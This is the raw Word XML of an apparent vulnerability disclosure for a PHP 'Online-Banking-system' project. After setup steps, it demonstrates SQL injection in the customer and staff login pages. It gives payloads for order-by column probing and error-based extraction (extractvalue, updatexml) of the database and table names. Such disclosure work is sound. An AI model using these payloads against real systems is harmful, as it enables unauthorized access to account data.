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4049" w14:textId="77777777" w:rsidR="00D20612" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="480" w:after="480" w:line="288" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>11.6-Online-Banking-system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411D1A63" w14:textId="64C00BCE" w:rsidR="004624F9" w:rsidRDefault="004624F9" w:rsidP="003E6074">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004624F9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Source code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>https://github.com/g33kyrash/Online-Banking-system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148A11B2" w14:textId="77777777" w:rsidR="004624F9" w:rsidRDefault="004624F9" w:rsidP="003E6074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 xml:space="preserve">Unzip the downloaded zip file and rename it and move it to the www directory of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>phpstuday_pro</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1330713C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9D425" wp14:editId="719C76C4">
            <wp:extent cx="5257800" cy="3486150"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="662375053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B92" w14:textId="77777777" w:rsidR="004624F9" w:rsidRDefault="004624F9" w:rsidP="005125D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Create a database called "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>bnak_db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">" and import the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>bank_db.sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> from phpMyAdmin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E91AB25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8529A1" wp14:editId="019AB2AD">
            <wp:extent cx="5257800" cy="4133850"/>
            <wp:effectExtent l="0" t="0" r="0" b="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4B3" w14:textId="77777777" w:rsidR="004624F9" w:rsidRDefault="004624F9" w:rsidP="008B2F9B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Change the username, database name, and password in the _</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>inc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>dbconn.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC1C294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C53844" wp14:editId="770C62FD">
            <wp:extent cx="5257800" cy="1743075"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2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D34" w14:textId="77777777" w:rsidR="004624F9" w:rsidRDefault="004624F9" w:rsidP="00E85ED3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Visit the homepage of the website, such as http://localhost/banking/index.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA014BC" w14:textId="77777777" w:rsidR="004624F9" w:rsidRDefault="004624F9" w:rsidP="00E85ED3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There is a login function to test SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6E490C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3E8AE5" wp14:editId="4763428A">
            <wp:extent cx="5257800" cy="2905125"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3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D054" w14:textId="77777777" w:rsidR="004624F9" w:rsidRDefault="004624F9" w:rsidP="00321F73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All enter the 1' test separately, and find an error, indicating that there is a SQL injection point</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8F06C5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FC8FAF" wp14:editId="05210777">
            <wp:extent cx="5257800" cy="1933575"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4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AA6" w14:textId="77777777" w:rsidR="004624F9" w:rsidRDefault="004624F9" w:rsidP="00DD7FF2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 xml:space="preserve">Note that when injecting the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>following,--</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> a space must be added after it, + cannot be decoded by the URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0E0956" w14:textId="11E3910A" w:rsidR="004624F9" w:rsidRDefault="004624F9" w:rsidP="00DD7FF2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 xml:space="preserve">Test with order by to show only </w:t>
      </w:r>
      <w:r w:rsidR="00FE19E4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189287B3" w14:textId="77777777" w:rsidR="00D20612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  <w:shd w:val="clear" w:color="auto" w:fill="FBBFBC"/>
        </w:rPr>
        <w:t xml:space="preserve">1' order by 2 -- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486C8AD6" w14:textId="77777777" w:rsidR="00D20612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  <w:shd w:val="clear" w:color="auto" w:fill="FBBFBC"/>
        </w:rPr>
        <w:t xml:space="preserve">1' order by 3 -- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1104CD05" w14:textId="77777777" w:rsidR="004624F9" w:rsidRDefault="004624F9" w:rsidP="00E85E7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Enter the password casually</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184337E5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28205E" wp14:editId="216EA292">
            <wp:extent cx="5257800" cy="2371725"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5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547D" w14:textId="77777777" w:rsidR="004624F9" w:rsidRDefault="004624F9" w:rsidP="0039108E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There is no echo on the joint injection page, so here we use the error injection to explode the database name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A37202D" w14:textId="77777777" w:rsidR="00D20612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  <w:shd w:val="clear" w:color="auto" w:fill="FBBFBC"/>
        </w:rPr>
        <w:t xml:space="preserve">-1' AND </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBBFBC"/>
        </w:rPr>
        <w:t>extractvalue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBBFBC"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBBFBC"/>
        </w:rPr>
        <w:t>1,concat</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBBFBC"/>
        </w:rPr>
        <w:t>(0x7</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBBFBC"/>
        </w:rPr>
        <w:t>e,database</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBBFBC"/>
        </w:rPr>
        <w:t xml:space="preserve">()))-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D80D40" w14:textId="77777777" w:rsidR="004624F9" w:rsidRDefault="004624F9" w:rsidP="00D50F22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The password is still randomly entered into the numbers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68811EF6" w14:textId="77777777" w:rsidR="004624F9" w:rsidRDefault="004624F9" w:rsidP="00D50F22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The discovery returned the database name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCBCDD6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5F8E83" wp14:editId="68EAF867">
            <wp:extent cx="5257800" cy="1790700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6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70B0" w14:textId="77777777" w:rsidR="004624F9" w:rsidRDefault="004624F9" w:rsidP="00F7516F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Explosive name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2466E25B" w14:textId="77777777" w:rsidR="00D20612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  <w:shd w:val="clear" w:color="auto" w:fill="FBBFBC"/>
        </w:rPr>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBBFBC"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBBFBC"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBBFBC"/>
        </w:rPr>
        <w:t>updatexml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBBFBC"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBBFBC"/>
        </w:rPr>
        <w:t xml:space="preserve">1, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBBFBC"/>
        </w:rPr>
        <w:t>concat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBBFBC"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBBFBC"/>
        </w:rPr>
        <w:t xml:space="preserve">0x7e, (select </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBBFBC"/>
        </w:rPr>
        <w:t>table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBBFBC"/>
        </w:rPr>
        <w:t xml:space="preserve"> from information_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBBFBC"/>
        </w:rPr>
        <w:t>schema.tables</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBBFBC"/>
        </w:rPr>
        <w:t xml:space="preserve"> where table_schema=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBBFBC"/>
        </w:rPr>
        <w:t>database(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBBFBC"/>
        </w:rPr>
        <w:t xml:space="preserve">) limit 0,1)), 1) -- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A067A34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4865D5" wp14:editId="09774AC3">
            <wp:extent cx="5257800" cy="1295400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7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ECED" w14:textId="77777777" w:rsidR="004624F9" w:rsidRDefault="004624F9" w:rsidP="008A684F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SQL injection is also present in the employee login system (localhost/banking/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>staff_login.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAA6956" w14:textId="77777777" w:rsidR="00D20612" w:rsidRDefault="00000000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7BDF06" wp14:editId="6B27CE41">
            <wp:extent cx="5257800" cy="3019425"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="8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E06F" w14:textId="77777777" w:rsidR="00D20612" w:rsidRDefault="00D20612">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00D20612">
      <w:headerReference w:type="default" r:id="rId16"/>
      <w:footerReference w:type="default" r:id="rId17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0C03" w14:textId="77777777" w:rsidR="0042180C" w:rsidRDefault="0042180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40B09F" w14:textId="77777777" w:rsidR="0042180C" w:rsidRDefault="0042180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166E" w14:textId="77777777" w:rsidR="00D20612" w:rsidRDefault="00D2061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0499" w14:textId="77777777" w:rsidR="0042180C" w:rsidRDefault="0042180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CCEB40" w14:textId="77777777" w:rsidR="0042180C" w:rsidRDefault="0042180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DABC" w14:textId="77777777" w:rsidR="00D20612" w:rsidRDefault="00D20612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612"/>
    <w:rsid w:val="0042180C"/>
    <w:rsid w:val="004624F9"/>
    <w:rsid w:val="009B6B74"/>
    <w:rsid w:val="00A96D6F"/>
    <w:rsid w:val="00AC5C40"/>
    <w:rsid w:val="00D20612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796B7"/>
  <w15:docId w15:val="{90C1D575-6FE9-48BA-8B83-E6CFFAAE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6F73-ADF5-4AF6-A822-C57A367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angjiayiyyyyy@hotmail.com</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-06T13:45:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-06T13:48:00Z</dcterms:modified>
</cp:coreProperties>
</file>